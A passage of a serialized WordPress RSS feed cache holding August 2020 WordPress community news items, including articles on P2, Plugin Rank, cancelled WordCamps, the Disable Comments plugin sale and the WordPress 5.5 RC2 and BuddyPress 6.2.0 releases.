ecosystem, every P2 has the opportunity to be unique, depending on which features it introduces through the editor. Burke said Automattic plans to allow admins to extend their P2 instances with plugins in the enterprise version.</p>\n\n\n\n<h2>P2 Set to Roll Out on WordPress.com, Self-Hosted Version Coming &ldquo;Eventually&rdquo; </h2>\n\n\n\n<p>P2 is just now entering beta but many fans are already eagerly awaiting a self-hosted version. Burke said it is coming &ldquo;eventually,&rdquo; but the team hasn&rsquo;t yet worked out how it will be structured. The project is not currently available on GitHub.</p>\n\n\n\n<p>&ldquo;With this launch version behind us the P2 team will turn to this but don&rsquo;t yet have a time-line,&rdquo; Burke said. &ldquo;The team will need to now define how the backend admin will look.&rdquo; The updated P2 is also coming to power conversations on WordPress.org further down the road.</p>\n\n\n\n<p>&ldquo;We don&rsquo;t yet have a target date but it is on the product roadmap,&rdquo; he said. &ldquo;This P2 version has been more than a theme or plugin update &ndash; it&rsquo;s really a product concept- so we can&rsquo;t simply update the WordPress.org P2 theme; it requires additional progress.&rdquo;</p>\n\n\n\n<p>P2 seems like it would be a good fit for Automattic&rsquo;s <a href=\"https://happy.tools/\">Happy Tools</a> suite of products for distributed teams. A version of P2 with more features may roll out under this brand once the beta concludes.</p>\n\n\n\n<p>&ldquo;Given the sudden global shift to remote work we really wanted to get out a stable product as soon as we could,&rdquo; Burke said. &ldquo;That really made WordPress.com the most expedient pathway to get P2 into peoples&rsquo; hands.</p>\n\n\n\n<p>&ldquo;Now that we have launched this version, we will make decisions around where the next releases will live. P2 has been envisioned as being part of the Happy Tools suite. But we are going to learn from the early users on WordPress.com and prioritize the next steps. We know that some users will need a premium version on WordPress.com in order to secure a custom domain and other features so we will update that shortly.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 06 Aug 2020 22:10:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:124:\"WPTavern: Plugin Rank Provides Insight Into WordPress Search Results, Competitive Analysis, and Email Reports for Developers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102835\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:289:\"https://wptavern.com/plugin-rank-provides-insight-into-wordpress-search-results-competitive-analysis-and-email-reports-for-developers?utm_source=rss&utm_medium=rss&utm_campaign=plugin-rank-provides-insight-into-wordpress-search-results-competitive-analysis-and-email-reports-for-developers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6181:\"<p class=\"has-drop-cap\">Iain Poulson announced that <a href=\"https://pluginrank.com/\">Plugin Rank</a> is open to the public yesterday. It is a new service that allows plugin authors to track their rankings by keyword on the official WordPress plugin directory. The service is geared toward plugin authors with freemium offerings.</p>\n\n\n\n<p>The tools were already in place for Poulson to build the service.  He just needed to build his service on top of them.  &ldquo;Plugin Rank leverages the WordPress.org API to retrieve a set of plugins for a search term,&rdquo; he said. &ldquo;It&rsquo;s the same API that WordPress uses when a user searches for a plugin inside their WordPress dashboard or when searching on the plugin directory.&rdquo;</p>\n\n\n\n<p>Poulson described how a user might search for a membership plugin by typing &ldquo;membership&rdquo; in the search box. The WordPress API returns a set of plugins that best match that term, based on an internal ranking algorithm. The Plugin Rank service uses this same, underlying technology.</p>\n\n\n\n<p>&ldquo;Plugin Rank will check the API daily to find the latest positions of the plugins for the keywords being tracked by Plugin Rank customers,&rdquo; he said. &ldquo;This data is then used to show position movement and charted to show an overall picture of how the plugins are ranking.&rdquo;</p>\n\n\n\n<img />Plugin dashboard screen.\n\n\n\n<p>The idea for the service was born from work he and others were doing at <a href=\"https://deliciousbrains.com/\">Delicious Brains</a>, a WordPress development company, a few months ago. &ldquo;We&rsquo;d started to work on improving the copy in the <a href=\"https://wordpress.org/plugins/wp-migrate-db/\">WP Migrate DB</a> plugin readme.txt files to rank higher in search results,&rdquo; he said. &ldquo;Brad Touesnard set up a Google sheet with all the keywords we wanted to rank for, a link to search the keyword on wordpress.org, and columns for each month. He started to record the position the plugin appears for each keyword every month. Or that was the idea, when we remembered!&rdquo;</p>\n\n\n\n<p>Poulson began using the same system for <a href=\"https://wpusermanager.com/\">WP User Manager</a> and <a href=\"https://intagrate.io/\">Intagrate</a>, two freemium plugins he had in the plugin directory. However, it did not take long to realize the futility of that system.</p>\n\n\n\n<p>&ldquo;The sheer manual nature of the task of setting up the sheet, monthly checking, and trying to remember to do it made me think there must be a better way,&rdquo; he said. &ldquo;So I started to work on an app to do it for me.&rdquo;</p>\n\n\n\n<p>Besides simply providing a particular plugin&rsquo;s rank, Poulson said the service provides information that can help plugin developers raise their rankings in the search results.</p>\n\n\n\n<img />Competitive analysis against other plugins.\n\n\n\n<p>&ldquo;The competitor analysis in Plugin Rank gives you an insight into the top 50 plugins that rank for the keywords you care about,&rdquo; said Poulson. &ldquo;It gives you insights into what those plugins are doing that make them rank higher than you. Do they have a high amount of the keyword in their readme? Do they have it in their title or tags? Do they answer the bulk of their support requests? Do they have a large number of five-star ratings?&rdquo;</p>\n\n\n\n<h2>A Premium Service with a Premium Price</h2>\n\n\n\n<p class=\"has-drop-cap\">Plugin Rank is the first service of its kind in the WordPress industry. Therefore, Poulson had to look outside of traditional WordPress channels to get a sense of how to <a href=\"https://pluginrank.com/pricing/\">price the new service.</a></p>\n\n\n\n<p>&ldquo;I looked at similar SEO tools for traditional search engines, like <a href=\"https://ahrefs.com/\">Ahrefs</a> and <a href=\"https://www.semrush.com/\">SEMrush</a>, and tried to base my pricing on how valuable it can be in relation to other marketing channels,&rdquo; he said.</p>\n\n\n\n<p>Only time and feedback will decide whether he found the sweet spot between offering a valuable service and what plugin developers are willing to fork over. The Starter tier allows plugin authors to track up to five keywords for a single plugin. It also includes email reports and competitor analysis. The $9 per month price tag is low enough for developers to dip their toes in and decide whether it is worth upgrading for tracking more keywords and plugins.</p>\n\n\n\n<p>The $49 Plus plan allows up to five plugins and 50 keywords. It also includes tracking for multiple languages. The $119 Pro plan bumps the plugin count to 20 and keyword number to 500.</p>\n\n\n\n<p>Right now, Plugin Rank is offering a 21-day free trial, which is a no-brainer for any freemium plugin author who might even be remotely interested in the service. <em>I have no doubt I would sign up if I was still in the freemium plugin game.</em></p>\n\n\n\n<p>&ldquo;Most developers and companies will invest heavily and get good results from content marketing and SEO improvements, and their WordPress.org plugin listing will receive little attention,&rdquo; said Poulson. &ldquo;But for freemium plugins, it can be a huge channel for getting people using their plugin and buying the up-sells. So it&rsquo;s priced with that in mind.&rdquo;</p>\n\n\n\n<h2>The Future of the Service</h2>\n\n\n\n<p class=\"has-drop-cap\">The <em>knowledge</em> of where a plugin stands in the rankings and having the data readily available will undoubtedly help many plugin authors. However, knowledge is merely the beginning of ranking higher. For developers who are not well-versed in marketing and SEO, they will need to develop new skills to make full use of what they learn from the service.</p>\n\n\n\n<p>Poulson seems interested in expanding the service beyond its initial goal of providing ranking data. Tutorials, videos, and other resources would be a nice value-add for those who buy into the service now.</p>\n\n\n\n<p>&ldquo;Plugin Rank&rsquo;s primary functionality at the moment is monitoring and getting access to data,&rdquo; he said, &ldquo;but I&rsquo;ve got features planned that focus on how to make improvements, as well as tutorial-style content on the Resources page.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 06 Aug 2020 21:14:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"BuddyPress: BuddyPress 6.2.0 Maintenance release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://buddypress.org/?p=313261\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://buddypress.org/2020/08/buddypress-6-2-0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1123:\"<p>Immediately available is&nbsp;<a href=\"https://downloads.wordpress.org/plugin/buddypress.6.2.0.zip\">BuddyPress 6.2.0</a>. This maintenance release:</p>\n\n\n\n<ul><li>fixes 1 bug related to the 6.0.0 release, </li><li>is preparing BuddyPress for WordPress 5.5.0,</li><li>is a recommended upgrade for all BuddyPress installations.</li></ul>\n\n\n\n<p>For details on the changes, please read the&nbsp;<a href=\"https://codex.buddypress.org/releases/version-6-2-0/\">6.2.0 release notes</a>.</p>\n\n\n\n<p>Update to BuddyPress 6.2.0 today in your WordPress Dashboard, or by&nbsp;<a href=\"https://wordpress.org/plugins/buddypress/\">downloading from the WordPress.org plugin repository</a>.</p>\n\n\n\n<h2>Many thanks to 6.2.0 contributors&nbsp;<span class=\"dashicons dashicons-heart\"></span></h2>\n\n\n\n<p><a href=\"https://profiles.wordpress.org/hareesh-pillai/\">hareesh-pillai</a>, <a href=\"https://profiles.wordpress.org/man4toman\">man4toman</a>, <a href=\"https://profiles.wordpress.org/dcavins/\">dcavins</a>, <a href=\"https://profiles.wordpress.org/boonebgorges\">boonebgorges</a>, <a href=\"https://profiles.wordpress.org/imath/\">imath</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 06 Aug 2020 19:40:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Mathieu Viet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"Post Status: Creating healthy virtual work environments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=79424\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://poststatus.com/creating-healthy-virtual-work-environments/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:738:\"<p>We\'re seeing the strain of isolation and 100% remote work without meetups, conferences, or other in-person opportunities to collaborate. In this episode of Post Status Draft, Cory and Brian discuss how to create healthy virtual work environments, including some tips for establishing better work days.</p>\n\n\n\n\n\n\n\n<p>Or watch this episode on YouTube:</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n\n</div>\n\n\n\n<h3>Sponsor: Pagely</h3>\n\n\n\n<p><a href=\"https://pagely.com/\">Pagely</a> offers best-in-class managed WordPress hosting, powered by Amazon\'s Cloud, the Internet’s most reliable infrastructure. Pagely helps big brands scale WordPress.Thank you to <a href=\"https://pagely.com/\">Pagely</a> for being a Post Status partner!</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 05 Aug 2020 23:10:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: WordPress Cancels All In-Person Flagship Events Until 2022\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102777\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:181:\"https://wptavern.com/wordpress-cancels-all-in-person-flagship-events-until-2022?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-cancels-all-in-person-flagship-events-until-2022\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3357:\"<p>As the world scrambles to invent and manufacture therapeutics and vaccines for COVID-19, the World Health Organization has <a href=\"https://www.who.int/news-room/detail/01-08-2020-covid-19-emergency-committee-highlights-need-for-response-efforts-over-long-term\">declared</a> the pandemic &ldquo;a once-in-a-century health crisis, the effects of which will be felt for decades to come.&rdquo; Outbreaks vary in severity across the globe, making it impossible to host international conferences safely for many months (and possibly years) to come.</p>\n\n\n\n<p>In consideration for the time and efforts of hundreds of volunteers who would be involved in planning in-person events, WordPress <a href=\"https://make.wordpress.org/community/2020/08/04/announcement-flagship-events-in-2021\">announced</a> it will no longer accept any applications for flagship events in 2021:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>Flagship events (i.e. large, regional WordCamps that attract an international audience) bring together people from all corners of the world, so until infection rates are effectively mitigated and/or a vaccine is widely available, these large scale events that typically host more than 1,000 individuals could become &ldquo;super-spreader&rdquo; events if a single infected person attends.&nbsp;</p><p>Applications for new flagship events (or regional events that cover multiple regions or countries) will not be accepted for all of 2021.</p></blockquote>\n\n\n\n<p>The announcement comes on the heels of <a href=\"https://wptavern.com/wordcamp-us-2020-canceled-due-to-pandemic-stress-and-online-event-fatigue\">WordCamp US canceling its virtual event</a> due to overextended organizers and online event fatigue for attendees. Up until this point, organizing teams from the large regional camps have been making their own determinations regarding the suitability of hosting an event online. The change announced this week prevents new events from applying and then inevitably having to transition to a virtual format.</p>\n\n\n\n<p>Existing flagship events that were already in the pipeline will be allowed to continue as online events. These include WordCamps Europe, US, Asia, and  Centroam&eacute;rica. Of these, WCEU has already <a href=\"https://wptavern.com/wordcamp-europe-goes-virtual-for-2021-in-person-conference-to-resume-2022\">announced</a> an online event.</p>\n\n\n\n<p>&ldquo;As&nbsp;<a href=\"https://make.wordpress.org/community/2020/07/23/building-community-beyond-events/\">online events continue to evolve</a>&nbsp;to reflect community needs, the Community Team strongly encourages these flagship organizing teams to be creative in their approach,&rdquo; Hugh Lashbrooke said in the announcement. This challenge forces organizers to proceed only if they can  knock it out of the park in terms of creativity. Otherwise, it&rsquo;s simply hosting another online conference in the same tired format for the sake of tradition. </p>\n\n\n\n<p>WordPress is at an interesting point in its history where it can no longer rely on in-person events to drive enthusiasm, education, and growth for the community. Flagship WordCamps are a necessary casualty in the fight to slow the spread of the virus, but this early decision provides a welcome peg of certainty for those who normally invest a significant amount of time in making these events a reality.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 05 Aug 2020 21:57:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"WPTavern: Disable Comments Plugin Looking for New Owner, Highest Bid Goes to Charity\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102771\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:211:\"https://wptavern.com/disable-comments-plugin-looking-for-new-owner-highest-bid-goes-to-charity?utm_source=rss&utm_medium=rss&utm_campaign=disable-comments-plugin-looking-for-new-owner-highest-bid-goes-to-charity\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4743:\"<p class=\"has-drop-cap\">Samir Shah is ready to part ways with his popular <a href=\"https://wordpress.org/plugins/disable-comments/\">Disable Comments</a> plugin. The WordPress extension has garnered over a million users and a solid 220 five-star reviews out of 229, but its owner no longer has the time to maintain it. Rather than simply give it away or sell it for profit, he plans to auction it for charity.  The highest bidder will donate to Effective Altruism Funds (EAF), a charitable organization, for ownership.</p>\n\n\n\n<p>Shah asks that those who are interested in bidding on the plugin contact him via his <a href=\"http://twitter.com/solaris_smoke/\">Twitter account</a>. He is also open to feedback on how to approach this at the moment.</p>\n\n\n\n<p>He first released the Disable Comments plugin in 2011. This was during a time that he was working professionally with WordPress. His primary use case was with corporate clients who did not need any sort of commenting functionality on the site.</p>\n\n\n\n<p>&ldquo;After repeating this implementation on several projects I ported it to a plugin,&rdquo; he said. &ldquo;The plugin became popular very quickly so it turns out this was a common use case.&rdquo;</p>\n\n\n\n<p>Shah used PHP and WordPress primarily between 2009 and 2015. However, the work his company has been doing has shifted his focus to other languages and platforms. He has not used WordPress professionally since 2016 but has continued maintaining this plugin for the community in his free time.</p>\n\n\n\n<p>&ldquo;In the last year or two I&rsquo;ve found it hard to keep up with the maintenance of the plugin,&rdquo; he said. &ldquo;I&rsquo;m increasingly unfamiliar with both the WordPress core (major changes like Gutenberg, for example) and with newer versions of PHP. It is time to find a new owner who is actively using WordPress.&rdquo;</p>\n\n\n\n<p>Disable Comments allows administrators to disable the comment functionality across the entire site. Users can also control it based on a specific post type or even disable comments across the network when used on a multisite installation.</p>\n\n\n\n<p>The primary use case is for disabling all commenting-related functionality. When this mode is enabled, the plugin hides comment links from all menus, removes comment widgets, hides the discussion settings screen, disables outgoing pingbacks, and more. Of course, it disables commenting on the front end too.</p>\n\n\n\n<p>Shah also has a <a href=\"https://github.com/solarissmoke/disable-comments-mu\">&ldquo;must use&rdquo; version</a> of the plugin available on GitHub. This comes in handy for professional work where the developer does not want the client to accidentally deactivate the plugin.</p>\n\n\n\n<p>&ldquo;I never intended to make any money off this plugin, which is completely free to use,&rdquo; said Shah. &ldquo;I have however received a number of financial offers for it over the years (presumably because people value the large user base), and so the idea I had was to auction it. The highest bidder would pay their bid to my preferred charitable organization, and send me a receipt as proof of donation in exchange for ownership of the plugin.&rdquo;</p>\n\n\n\n<p>He is hoping that someone in the community will value a free plugin that does not generate revenue. With over a million active installs, there is a possibility that a company could directly or indirectly profit from ownership. Even if not, this would be a good opportunity for someone with the resources to give back to the WordPress community. There is an obvious need for this type of plugin.</p>\n\n\n\n<p>While Shah says he does not spend much time on charitable work, he does try to donate a percentage of his annual income to charity and believes this is another avenue to do some good.</p>\n\n\n\n<p>&ldquo;I&rsquo;m in the privileged position at the moment of having sufficient income to meet my basic needs,&rdquo; he said. &ldquo;Selling the plugin for profit isn&rsquo;t going to alter my standard of living, and I&rsquo;m not interested in profit for its own sake. If I can extract some value from this plugin and give it to EAF then it will go some way to improving the lives of others.&rdquo;</p>\n\n\n\n<p>He said he chose EAF because it uses an evidence-based approach to distributing funds by focusing on empirical measures of impact. &ldquo;This felt to me like a better strategy than just picking a cause that I was personally attached to. There are particular areas of their work &mdash; e.g., the long-term future fund &mdash; that I think are especially important today.&rdquo;</p>\n\n\n\n<p>It will be interesting to see how this type of <em>sale</em> works out. What do you think of trading ownership of a plugin for a charitable contribution?</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 05 Aug 2020 18:45:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WordPress.org blog: WordPress 5.5 Release Candidate 2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8764\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2020/08/wordpress-5-5-release-candidate-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2501:\"<p>The second release candidate for WordPress 5.5 is here!</p>\n\n\n\n<p>WordPress 5.5 is slated for release&nbsp;on&nbsp;<strong>August 11, 2020</strong>, but we need&nbsp;<em>your</em>&nbsp;help to get there—if you haven’t tried 5.5 yet,&nbsp;now is the time!</p>\n\n\n\n<p>You can test the WordPress 5.5 release candidate in two ways:</p>\n\n\n\n<ul><li>Try the&nbsp;<a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a>&nbsp;plugin (choose the “bleeding edge nightlies” option)</li><li>Or&nbsp;<a href=\"https://wordpress.org/wordpress-5.5-RC2.zip\">download the release candidate here (zip)</a>.</li></ul>\n\n\n\n<p>Thank you to all of the contributors who tested the&nbsp;Beta releases and gave feedback. Testing for bugs is a critical part of polishing every release and a great way to contribute to WordPress.</p>\n\n\n\n<h2>Plugin and Theme Developers</h2>\n\n\n\n<p>Please test your plugins and themes against WordPress 5.5 and update the&nbsp;<em>Tested up to</em>&nbsp;version in the readme file to 5.5. If you find compatibility problems, please be sure to post to the&nbsp;<a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>,&nbsp;so those can be figured out before the final release.</p>\n\n\n\n<p>For a more detailed breakdown of the changes included in WordPress 5.5, check out the <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-1/\">WordPress 5.5 beta 1 post</a>. The&nbsp;<a href=\"https://make.wordpress.org/core/2020/07/30/wordpress-5-5-field-guide/\">WordPress 5.5 Field Guide</a>&nbsp;is also out! It’s your source for details on all the major changes.</p>\n\n\n\n<h2>How to Help</h2>\n\n\n\n<p>Do you speak a language other than English?&nbsp;<a href=\"https://translate.wordpress.org/projects/wp/dev\">Help us translate WordPress into more than 100 languages!</a>&nbsp;This release also marks the&nbsp;<a href=\"https://make.wordpress.org/polyglots/handbook/glossary/#hard-freeze\">hard string freeze</a>&nbsp;point of the 5.5 release schedule.</p>\n\n\n\n<p><em><strong>If you think you’ve found a bug</strong>, you can post to the&nbsp;<a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a>&nbsp;in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report,&nbsp;<a href=\"https://make.wordpress.org/core/reports/\">fill one on WordPress Trac</a>, where you can also find&nbsp;<a href=\"https://core.trac.wordpress.org/tickets/major\">a list of known bugs</a>.</em></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 04 Aug 2020 19:12:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jake Spurlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	